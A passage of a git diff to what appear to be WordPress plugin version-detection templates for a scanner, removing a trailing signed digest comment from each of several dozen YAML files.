b/http/technologies/wordpress/plugins/chaty.yaml index c748b9c51a9..0cd866179ee 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220636fbbe948fe30c6a91dd4a9093ed221d7f8a186607c18482e1987c68b1add5c022100ac1a6dec93b32f63676329103d300a92c27f35dd985f322fabe6283759d06c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 4db6a405cd8..b1d8479d139 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfa100e0acf43683080bf1fb05c19fb0c57c6856a9ed109e2f349ef838447711022100ad14df13f9cc5e97727a389c370ba43d2770d92c29938172a621822c751960da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index f0bf70c5a7e..04e090313f6 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0795fd49ffe260f662d7833ed60f4a3ee97e0a1c091f942f6bd5dfdb7657ad902201d1c56fc4d73fe5f96f610fd47d1e78a7d32069f271639803d619ed178ae6317:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 04da5075a41..57e618924be 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb387ef1353ed22ba9e955ba66a381578d012221e169eb1588fee2cd58d690b80220342f8c32942be13da7a3709a6e1cdefe0ac40e6ba7e75bd9bacc2c0987af128e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 5322b4a34e4..571b3b20a39 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec41318d996698c266376336f9d748acf2df7eff4cae613ab4694d288bdd8cbf0220602563c441d91c5bc64a145703f1032bb5bbf20d6d19a66cf0d80697ba1a7856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 58929a537f0..4d562316b4a 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100977157248671bf40e47561d444e9bcf17b42e465411279a09aa5f509bdd22bf102201066c65e4418cc5899aca74c398837269f2b478a3669157f5850e977683b3eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 8cedbd5267f..dcea952545d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055f377e3abf2670e5abb980dbdbdfaef27b99555805f0a6aaab55c83c95c9eb80221008adfb9a5199fe885e6db26a3f40af2a0c8b360307f093cd4a5b6a330c9a3b984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 76bedbb3c33..0ae2f181225 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091d8ccae937979f81beed96269ecba5466b8a2aad0a14095ea465b32821d2e980220070b5a7b1293791e4f8f100306a5236612c2ba4f28e1f3c66144cd73ad80f4f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index adaf4ecae21..12f549d5369 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220513e68a5124b3f29e8844052f6311f5293c3bd376c3ce45f026d672e83f00fc702204e750c48b5928af2f103650940debef4d7d0af509b802d567df7b475034bf1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d4634336646..d8ea6a72f1d 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb0445efbde7f26077f3b48ff5e53cf1d1a3b55a61af5824389cf0412b6b03a602207aa75967b92c6c2559d86a862cad4a85083570652fc6bb21e45af5523b43a066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index b5fa2663627..4afaf9dc979 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e013ec59adfff32d71a88c5c7b6c5ce0af148a18227bd4f7a74a98d63ccbbe202201588aa83352424087d24f8cc3773da6e292725d52b7317d12250a1fffeb1c051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index b92eeef6f51..88fea67f934 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201bc38c0f5d88cadda71d295d2bc50a714aac105cb72f9931d482033fed6584fa02200b91ff8c8d2e9f6fccd45b77405d531ae67d3e800c7e789c1f9d8fd848c1ee71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 10a6e087d59..d205cdbf361 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7f36201c832c8bdd692f3b29dbb007ed952f15495b1029d4110be06821822f1022017ce7812981acd717163815e10c620ec91603a04a2ae98848e612e8c721760c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 20ec6aef1c1..3fa20df7d26 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017bf92efe29161cdaf705bca0b889a9d608f0037a0eff16122157a0e3220afb7022100958d80c4d55f5e2e92daa9e5bd835065a755c33b82a59a6d0b2a96f47aaa5732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 653ebda20f5..bcd63ced86e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1bb75e9850fc1394117d85bb5ab55fe3f9d2de0e27ba145f2b1a3f89766976a022100e09560d3f214c6b2572b3550ddac5fafd32497129c9a912f952e112cbfdd87d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 671f9f16f45..bca0326f2b6 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022018cab9081e043729db09e9b37153ef2b51ee290d88cdee5c7de8150eeca03b15022100b4e6b6d7f111df0b23c2407d2e0ee92e78d8ac0ce8e23c06098380d8ebd84621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c17c8adbb20..854328f04b0 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206415a097e4a12ab73e541b0ffe564c23bcc1515c342ea8bf97ea599d62bdaae1022100f7b8d2aacc052671eb704fe2dbf7c2b81c82a83ebf98c9a05bf3b41e87acf9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 62a7acb5420..6d3f7f4566f 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e019012493fd241bbdc14b5145781f2a28fee5644f7aec272622be85bf3e8be022100d96098de74700afb184f448ef0f4021ff3baa59c95cc05912ca1ec3ac0f86e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 69a332d0acf..a923d21a154 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201af4c24576758970bb619ba72a3787e9c6b81754dbfa573fd10ab618696b48920220573832c0caf8919135d9a67c3af4e46284400a47c53f899ba0224ae501f7040e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 8077798f5f2..f10480fc8f2 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220727e034a12924e3d688d89df534b5bd7720f38e9425b0d6f34edba5ffd60bc9a022100ff13fcc0e45d94834d548c34cf210e3503acbf0e5aa6b19a4986baa81b22d87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 51c04665c25..6c920917673 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220449cc13e3691f0806c03720d96eafca4abf0fb4600b971213c89fc42901b5a5f022100c1b16a6fdb0864d7892198d3ece4ad0a25caf260e35ed92cef5cc3e3d38c9a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 25ade1be032..b25c6c9a9ce 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009723fb9d5cc518917d1d63ff78db96d1270d8b76b3e82859d45cef1d7e0292e3022063d79437855b41c5514e666953a8427e46dc7a9fd4b59808ed1f8a71353e35df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index cb920711bb9..1781172d05e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0f01653fae6e65eacb0b63f008f34c1f4efd7955cb86159b74ef6cdeba45e9a022100e052e87393749daa920baaf3335422fb335ebfc43362f597c6ad340443a0b88d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 79b57364247..92c8ce34093 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087e23acd4a4177dce4b0b2a79e85ab43ee5c11287d696fc42a58ee5b4840148b02207f850b69a5f07b4b056325bdaebf6779eafb8dfeedc2b6f396baef8e4470d64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 965e56753f4..eea42ed8dad 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075c1dddf9a70a8706878bc3d54b07873385c43114cf777508da8879edaf0c826022100e7c6422d535ce054e291b0e02ab1a8c1611953ae85f39144712e79a3b9233d6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d7e375754d8..bedb85a0eba 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220285e3cd9ab358ede051d7d18b730e1b980766236449f54b467bb4fd3652004f4022036faf3aee6d46a7409191639712b62155c3d054527ed9d20859beb315bc77422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 60854aa70f8..45bbbc71df5 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db65fb5913db67f2184b84d645c504556fec34a2ec487e585bd5a9359737b16f0220656799ee616826ab843ba1ad780181b4c313ecec294ee73f9056119cd4183fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index f9dc2567424..03befac73ed 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010946f40808b25b3087b154bee2d92a29e2905f815988db0e72538059a322988022100ecd30893267c0eaeca135af555d46e0799826e0da200be008e5f004f5a4f2b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 41304e20413..e1f00931279 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028d682c82b809e77e5c2dc813f48afa69fbf4b8c8387032d2bc523d147d1679102201e397e9ed3600a767873ae0f2dcfa0ec27fdec61d0653ddabc98abebcb726a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 85838db941a..0db316d66d6 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203688a6cf4365354a23a33952bcbacfe8d2df5446d0078e3225b246bb4065b7130221009828e2fb09215bc5e13fe2a5b4611b6b648cb5bfd216b4010fee0ee44fac77c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 1535203cc08..135639253d8 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acddf8a6e85b00a7ae3873ca826e5970aa18c810c45d09813f94583860fdbcb2022100a2d6a0c6041ddbff3367b91a6198b7df1ceab65610af40ce958339ea071961bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 61b657f7649..540fbaf9ace 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc5d8e52c3b958f3e2b145144dd3b090a3eeb3523d89d9109151f6b0f4051ebb0220196b7195e5c261edc83a8cb9080968d2dbb916f2bd32dfca665624d311df9b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 21df8cec2da..7e71b4736fd 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3f2ecd9eec04caf0fb007676543952b491dc71b24f9352fa617272cca0caa66022100cec7cedbc17abdb1e7cf67f58a882f94de07dfb6e75b6f58fd865b7f64cc2b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d7fa6d2caa1..88a70b24789 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f118d7f3f06e897042c96b60a95fa4417f4af15709663552b347c3dd66b4277022100e1435a9baf2d7961d375aa2691c019b5422e69f45d8c13c2796a8c57af4152a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 979e325834e..fc498e67e6d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3b85815d70885bbbc6d257c7ecca351213962c91b0e558993f766fa7cdbd257022100fa825257c3b7b90fb28c7ce38ad4ef68acecfa81357f407edfbaf07115977fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 763b33b660f..465aa93d578 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220755011c469209c588eded736fcd32ab479374ef2f0f403a7fa8ee976a8cc7c1b02201f9bc34b2b4c221ee73541c8dc21c586e8cedd33b85e8634268f4c151142fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 7a9b82c625a..2a1b0e57a90 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e05432e3edeb5c11b7c22efdabc12fade7bffb997e2ece55d3c783e7e61c0eb2022100df4fc2ff3cb0aa7efa335673dccad52fb38afb07e53a80f48da61514d7e11aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 0864394d02c..df35e8b415d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a5dfc62c4bd77645cae935d95bf268282afad038a4637b1706d7294e1171261022100f5a540150c966739180c4d46957b3c79aaab48a1112ebf9e10e681aab51c9e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index ace69d621ff..033cc4bc3d2 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3bedddc13bd28b39da2c2bca7695678dacf946d860cf251c334f80cfaab45f8022100f5e4b92b4db38eb6fefe4c274fa014c8c2236ccb503a14d2998a8dce025c97de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index d6562fe5be6..945ab6ad03c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a631a7142134a3a70f792f254db692631b390def25335eac94a591429c744f5602200f21c8604d8c36a21c08bc833f4a8ea54bec6acd985080d12a4175bb1045c26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 0f26435fa47..2072b51ab9c 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000a3fa2417607264b8264f50739c88338de7fea6439a93e80d8055aecb22eecb022100c270e10e34a4e296b3fbaad38b170a4d293c8974366ebd8bc72a0ebe0b4e4d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 2be22d8fcb2..b509d8cc670 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207be231429679770720d13f1f6cd4769d91211c2c5d658c37d8e56481904fe497022015d31c8336ac81b6160f119b6b1f38f92bd7e809136289d78bcd86e804e16f06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 3665b5f9c5b..c984479bde5 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200fae3b24a23347e3039d0085fd6e7524ee088fa825cbb2bafbe9ea046dd35e8202202179ab7823eea7a825d7856452019c4c079777147533e81378f17bb367b305c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 18a5311bea3..a3870175c7d 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093d56a7033ad661f7c38996ecaf70758bc63ed5891356d55480d217bd9a267c902201098e1cefee25b1eb37f01246726469cdee738b5ec12a357526816287e31cb6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index b71afc44156..f5f3818ea24 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207fdacbbc7e17c8ba7d73efbe284ee860fa4852cfa55815c0b866496760005b570220720cc33c3861496f19591d97c0bc3b686ec4d46cbaf9c791b632a2df195942c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index bf956fda929..7e5b54c12c7 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b763ef0b627ffdd00861f63d9e6ddfd83668a75b985a90d3feb1364599eee6d0221009a952c7ad55f78297ce4954967a2a8b7802068c7aa0eb80f8f538b7829b30e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 5dc27dfbf8d..59effd09f64 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6185025a11933332e04ea60fd0bdb3f7fefdcead48b95d323c82f5cd805e33b0220148b06a675540b86b31d32647a2f3a6dd899a29c2cd50090265d54e2c542da9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 